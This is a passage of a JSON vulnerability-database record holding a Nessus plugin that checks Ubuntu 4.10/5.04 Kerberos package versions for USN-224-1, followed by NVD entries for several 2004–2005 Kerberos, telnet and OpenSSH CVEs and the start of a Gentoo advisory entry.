"cpe": ["p-cpe:/a:canonical:ubuntu_linux:libkthacl1-kerberos4kth", "p-cpe:/a:canonical:ubuntu_linux:libkrb-1-kerberos4kth", "p-cpe:/a:canonical:ubuntu_linux:kerberos4kth-user", "p-cpe:/a:canonical:ubuntu_linux:kerberos4kth-dev", "p-cpe:/a:canonical:ubuntu_linux:krb5-admin-server", "p-cpe:/a:canonical:ubuntu_linux:krb5-doc", "p-cpe:/a:canonical:ubuntu_linux:libroken16-kerberos4kth", "p-cpe:/a:canonical:ubuntu_linux:krb5-ftpd", "p-cpe:/a:canonical:ubuntu_linux:krb5-kdc", "p-cpe:/a:canonical:ubuntu_linux:kerberos4kth-clients", "p-cpe:/a:canonical:ubuntu_linux:kerberos4kth-servers", "cpe:/o:canonical:ubuntu_linux:5.04", "p-cpe:/a:canonical:ubuntu_linux:libkdb-1-kerberos4kth", "p-cpe:/a:canonical:ubuntu_linux:libotp0-kerberos4kth", "p-cpe:/a:canonical:ubuntu_linux:krb5-rsh-server", "p-cpe:/a:canonical:ubuntu_linux:libsl0-kerberos4kth", "p-cpe:/a:canonical:ubuntu_linux:krb5-user", "p-cpe:/a:canonical:ubuntu_linux:krb5-clients", "cpe:/o:canonical:ubuntu_linux:4.10", "p-cpe:/a:canonical:ubuntu_linux:krb5-telnetd", "p-cpe:/a:canonical:ubuntu_linux:libkadm55", "p-cpe:/a:canonical:ubuntu_linux:kerberos4kth-services", "p-cpe:/a:canonical:ubuntu_linux:libkafs0-kerberos4kth", "p-cpe:/a:canonical:ubuntu_linux:kerberos4kth-x11", "p-cpe:/a:canonical:ubuntu_linux:kerberos4kth-servers-x", "p-cpe:/a:canonical:ubuntu_linux:kerberos4kth1", "p-cpe:/a:canonical:ubuntu_linux:kerberos4kth-docs", "p-cpe:/a:canonical:ubuntu_linux:libkrb53", "p-cpe:/a:canonical:ubuntu_linux:kerberos4kth-kip", "p-cpe:/a:canonical:ubuntu_linux:kerberos4kth-clients-x", "p-cpe:/a:canonical:ubuntu_linux:libss0-kerberos4kth", "p-cpe:/a:canonical:ubuntu_linux:kerberos4kth-kdc", "p-cpe:/a:canonical:ubuntu_linux:libkadm1-kerberos4kth", "p-cpe:/a:canonical:ubuntu_linux:libkrb5-dev"], "id": "UBUNTU_USN-224-1.NASL", "href": "https://www.tenable.com/plugins/nessus/20767", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-224-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20767);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/08/02 13:33:00\");\n\n script_cve_id(\"CVE-2005-0468\", \"CVE-2005-0469\", \"CVE-2005-1174\", \"CVE-2005-1175\", \"CVE-2005-1689\");\n script_xref(name:\"USN\", value:\"224-1\");\n\n script_name(english:\"Ubuntu 4.10 / 5.04 : krb4, krb5 vulnerabilities (USN-224-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Gael Delalleau discovered a buffer overflow in the env_opt_add()\nfunction of the Kerberos 4 and 5 telnet clients. By sending specially\ncrafted replies, a malicious telnet server could exploit this to\nexecute arbitrary code with the privileges of the user running the\ntelnet client. (CVE-2005-0468)\n\nGael Delalleau discovered a buffer overflow in the handling of the\nLINEMODE suboptions in the telnet clients of Kerberos 4 and 5. By\nsending a specially constructed reply containing a large number of SLC\n(Set Local Character) commands, a remote attacker (i. e. a malicious\ntelnet server) could execute arbitrary commands with the privileges of\nthe user running the telnet client. (CVE-2005-0469)\n\nDaniel Wachdorf discovered two remote vulnerabilities in the Key\nDistribution Center of Kerberos 5 (krb5-kdc). By sending certain TCP\nconnection requests, a remote attacker could trigger a double-freeing\nof memory, which led to memory corruption and a crash of the KDC\nserver. (CVE-2005-1174). Under rare circumstances the same type of TCP\nconnection requests could also trigger a buffer overflow that could be\nexploited to run arbitrary code with the privileges of the KDC server.\n(CVE-2005-1175)\n\nMagnus Hagander discovered that the krb5_recvauth() function attempted\nto free previously freed memory in some situations. A remote attacker\ncould possibly exploit this to run arbitrary code with the privileges\nof the program that called this function. Most imporantly, this\naffects the following daemons: kpropd (from the krb5-kdc package),\nklogind, and kshd (both from the krb5-rsh-server package).\n(CVE-2005-1689)\n\nPlease note that these packages are not officially supported by Ubuntu\n(they are in the 'universe' component of the archive).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:kerberos4kth-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:kerberos4kth-clients-x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:kerberos4kth-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:kerberos4kth-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:kerberos4kth-kdc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:kerberos4kth-kip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:kerberos4kth-servers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:kerberos4kth-servers-x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:kerberos4kth-services\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:kerberos4kth-user\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:kerberos4kth-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:kerberos4kth1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:krb5-admin-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:krb5-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:krb5-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:krb5-ftpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:krb5-kdc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:krb5-rsh-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:krb5-telnetd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:krb5-user\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libkadm1-kerberos4kth\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libkadm55\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libkafs0-kerberos4kth\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libkdb-1-kerberos4kth\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libkrb-1-kerberos4kth\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libkrb5-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libkrb53\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libkthacl1-kerberos4kth\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libotp0-kerberos4kth\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libroken16-kerberos4kth\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libsl0-kerberos4kth\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libss0-kerberos4kth\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:4.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.04\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/01/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2005-2019 Canonical, Inc. / NASL script (C) 2006-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(4\\.10|5\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 4.10 / 5.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"4.10\", pkgname:\"kerberos4kth-clients\", pkgver:\"1.2.2-10ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"kerberos4kth-clients-x\", pkgver:\"1.2.2-10ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"kerberos4kth-dev\", pkgver:\"1.2.2-10ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"kerberos4kth-docs\", pkgver:\"1.2.2-10ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"kerberos4kth-kdc\", pkgver:\"1.2.2-10ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"kerberos4kth-kip\", pkgver:\"1.2.2-10ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"kerberos4kth-servers\", pkgver:\"1.2.2-10ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"kerberos4kth-servers-x\", pkgver:\"1.2.2-10ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"kerberos4kth-services\", pkgver:\"1.2.2-10ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"kerberos4kth-user\", pkgver:\"1.2.2-10ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"kerberos4kth-x11\", pkgver:\"1.2.2-10ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"kerberos4kth1\", pkgver:\"1.2.2-10ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"krb5-admin-server\", pkgver:\"1.3.4-3ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"krb5-clients\", pkgver:\"1.3.4-3ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"krb5-doc\", pkgver:\"1.3.4-3ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"krb5-ftpd\", pkgver:\"1.3.4-3ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"krb5-kdc\", pkgver:\"1.3.4-3ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"krb5-rsh-server\", pkgver:\"1.3.4-3ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"krb5-telnetd\", pkgver:\"1.3.4-3ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"krb5-user\", pkgver:\"1.3.4-3ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"libkadm1-kerberos4kth\", pkgver:\"1.2.2-10ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"libkadm55\", pkgver:\"1.3.4-3ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"libkafs0-kerberos4kth\", pkgver:\"1.2.2-10ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"libkdb-1-kerberos4kth\", pkgver:\"1.2.2-10ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"libkrb-1-kerberos4kth\", pkgver:\"1.2.2-10ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"libkrb5-dev\", pkgver:\"1.3.4-3ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"libkrb53\", pkgver:\"1.3.4-3ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"libkthacl1-kerberos4kth\", pkgver:\"1.2.2-10ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"libotp0-kerberos4kth\", pkgver:\"1.2.2-10ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"libroken16-kerberos4kth\", pkgver:\"1.2.2-10ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"libsl0-kerberos4kth\", pkgver:\"1.2.2-10ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"libss0-kerberos4kth\", pkgver:\"1.2.2-10ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"kerberos4kth-clients\", pkgver:\"1.2.2-11.1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"kerberos4kth-clients-x\", pkgver:\"1.2.2-11.1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"kerberos4kth-dev\", pkgver:\"1.2.2-11.1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"kerberos4kth-docs\", pkgver:\"1.2.2-11.1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"kerberos4kth-kdc\", pkgver:\"1.2.2-11.1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"kerberos4kth-kip\", pkgver:\"1.2.2-11.1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"kerberos4kth-servers\", pkgver:\"1.2.2-11.1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"kerberos4kth-servers-x\", pkgver:\"1.2.2-11.1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"kerberos4kth-services\", pkgver:\"1.2.2-11.1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"kerberos4kth-user\", pkgver:\"1.2.2-11.1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"kerberos4kth-x11\", pkgver:\"1.2.2-11.1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"kerberos4kth1\", pkgver:\"1.2.2-11.1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"krb5-admin-server\", pkgver:\"1.3.6-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"krb5-clients\", pkgver:\"1.3.6-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"krb5-doc\", pkgver:\"1.3.6-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"krb5-ftpd\", pkgver:\"1.3.6-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"krb5-kdc\", pkgver:\"1.3.6-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"krb5-rsh-server\", pkgver:\"1.3.6-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"krb5-telnetd\", pkgver:\"1.3.6-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"krb5-user\", pkgver:\"1.3.6-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libkadm1-kerberos4kth\", pkgver:\"1.2.2-11.1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libkadm55\", pkgver:\"1.3.6-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libkafs0-kerberos4kth\", pkgver:\"1.2.2-11.1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libkdb-1-kerberos4kth\", pkgver:\"1.2.2-11.1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libkrb-1-kerberos4kth\", pkgver:\"1.2.2-11.1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libkrb5-dev\", pkgver:\"1.3.6-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libkrb53\", pkgver:\"1.3.6-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libkthacl1-kerberos4kth\", pkgver:\"1.2.2-11.1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libotp0-kerberos4kth\", pkgver:\"1.2.2-11.1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libroken16-kerberos4kth\", pkgver:\"1.2.2-11.1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libsl0-kerberos4kth\", pkgver:\"1.2.2-11.1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libss0-kerberos4kth\", pkgver:\"1.2.2-11.1ubuntu2.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kerberos4kth-clients / kerberos4kth-clients-x / kerberos4kth-dev / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2020-09-21T13:48:37", "description": "Double free vulnerability in the krb5_recvauth function in MIT Kerberos 5 (krb5) 1.4.1 and earlier allows remote attackers to execute arbitrary code via certain error conditions.", "edition": 3, "cvss3": {}, "published": "2005-07-18T04:00:00", "title": "CVE-2005-1689", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2005-1689"], "modified": "2020-01-21T15:45:00", "cpe": ["cpe:/a:mit:kerberos_5:1.3", "cpe:/a:mit:kerberos_5:1.3.5", "cpe:/a:mit:kerberos_5:1.3.2", "cpe:/a:mit:kerberos_5:1.4.1", "cpe:/a:mit:kerberos_5:1.3.3", "cpe:/a:mit:kerberos_5:1.3.6", "cpe:/a:mit:kerberos_5:1.3.4", "cpe:/a:mit:kerberos_5:1.4", "cpe:/a:mit:kerberos_5:1.3.1"], "id": "CVE-2005-1689", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1689", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mit:kerberos_5:1.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:mit:kerberos_5:1.4:*:*:*:*:*:*:*", "cpe:2.3:a:mit:kerberos_5:1.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:mit:kerberos_5:1.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:mit:kerberos_5:1.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:mit:kerberos_5:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:mit:kerberos_5:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:mit:kerberos_5:1.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:mit:kerberos_5:1.3.4:*:*:*:*:*:*:*"]}, {"lastseen": "2020-09-21T13:48:37", "description": "Heap-based buffer overflow in the Key Distribution Center (KDC) in MIT Kerberos 5 (krb5) 1.4.1 and earlier allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a certain valid TCP or UDP request.", "edition": 3, "cvss3": {}, "published": "2005-07-18T04:00:00", "title": "CVE-2005-1175", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2005-1175"], "modified": "2020-01-21T15:45:00", "cpe": ["cpe:/a:mit:kerberos_5:1.3", "cpe:/a:mit:kerberos_5:1.3.5", "cpe:/a:mit:kerberos_5:1.3.2", "cpe:/a:mit:kerberos_5:1.4.1", "cpe:/a:mit:kerberos_5:1.3.3", "cpe:/a:mit:kerberos_5:1.3.6", "cpe:/a:mit:kerberos_5:1.3.4", "cpe:/a:mit:kerberos_5:1.4", "cpe:/a:mit:kerberos_5:1.3.1"], "id": "CVE-2005-1175", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1175", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mit:kerberos_5:1.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:mit:kerberos_5:1.4:*:*:*:*:*:*:*", "cpe:2.3:a:mit:kerberos_5:1.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:mit:kerberos_5:1.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:mit:kerberos_5:1.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:mit:kerberos_5:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:mit:kerberos_5:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:mit:kerberos_5:1.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:mit:kerberos_5:1.3.4:*:*:*:*:*:*:*"]}, {"lastseen": "2020-09-21T13:47:42", "description": "Directory traversal vulnerability in scp for OpenSSH before 3.4p1 allows remote malicious servers to overwrite arbitrary files. NOTE: this may be a rediscovery of CVE-2000-0992.", "edition": 2, "cvss3": {}, "published": "2004-08-18T04:00:00", "title": "CVE-2004-0175", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0175"], "modified": "2017-10-11T01:29:00", "cpe": ["cpe:/a:openbsd:openssh:3.1", "cpe:/a:openbsd:openssh:3.0p1", "cpe:/a:openbsd:openssh:3.0.1p1", "cpe:/a:openbsd:openssh:3.0.2p1", "cpe:/a:openbsd:openssh:3.1p1", "cpe:/a:openbsd:openssh:3.3", "cpe:/a:openbsd:openssh:3.2", "cpe:/a:openbsd:openssh:3.3p1", "cpe:/a:openbsd:openssh:3.4", "cpe:/a:openbsd:openssh:3.2.2p1", "cpe:/a:openbsd:openssh:3.4p1", "cpe:/a:openbsd:openssh:3.0.2", "cpe:/a:openbsd:openssh:3.2.3p1", "cpe:/a:openbsd:openssh:3.0", "cpe:/a:openbsd:openssh:3.0.1"], "id": "CVE-2004-0175", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0175", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:openbsd:openssh:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:openbsd:openssh:3.0p1:*:*:*:*:*:*:*", "cpe:2.3:a:openbsd:openssh:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:openbsd:openssh:3.1p1:*:*:*:*:*:*:*", "cpe:2.3:a:openbsd:openssh:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:openbsd:openssh:3.3:*:*:*:*:*:*:*", "cpe:2.3:a:openbsd:openssh:3.0.2p1:*:*:*:*:*:*:*", "cpe:2.3:a:openbsd:openssh:3.4:*:*:*:*:*:*:*", "cpe:2.3:a:openbsd:openssh:3.3p1:*:*:*:*:*:*:*", "cpe:2.3:a:openbsd:openssh:3.4p1:*:*:*:*:*:*:*", "cpe:2.3:a:openbsd:openssh:3.0.1p1:*:*:*:*:*:*:*", "cpe:2.3:a:openbsd:openssh:3.2:*:*:*:*:*:*:*", "cpe:2.3:a:openbsd:openssh:3.2.2p1:*:*:*:*:*:*:*", "cpe:2.3:a:openbsd:openssh:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:openbsd:openssh:3.2.3p1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-09-21T13:48:37", "description": "Certain BSD-based Telnet clients, including those used on Solaris and SuSE Linux, allow remote malicious Telnet servers to read sensitive environment variables via the NEW-ENVIRON option with a SEND ENV_USERVAR command.", "edition": 3, "cvss3": {}, "published": "2005-06-14T04:00:00", "title": "CVE-2005-0488", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-0488"], "modified": "2020-01-21T15:45:00", "cpe": ["cpe:/a:mit:kerberos_5:1.3.4", "cpe:/o:sun:sunos:5.9", "cpe:/a:microsoft:telnet_client:5.1.2600.2180"], "id": "CVE-2005-0488", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0488", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:microsoft:telnet_client:5.1.2600.2180:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.9:*:*:*:*:*:*:*", "cpe:2.3:a:mit:kerberos_5:1.3.4:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-24T12:50:23", "description": "The remote host is missing updates announced in\nadvisory GLSA 200507-11.", "edition": 2, "published": "2008-09-24T00:00:00", "title": "Gentoo Security Advisory GLSA 200507-11 (mit-krb5)", "type": "openvas", "bulletinFamily": "scanner", "cvelist": 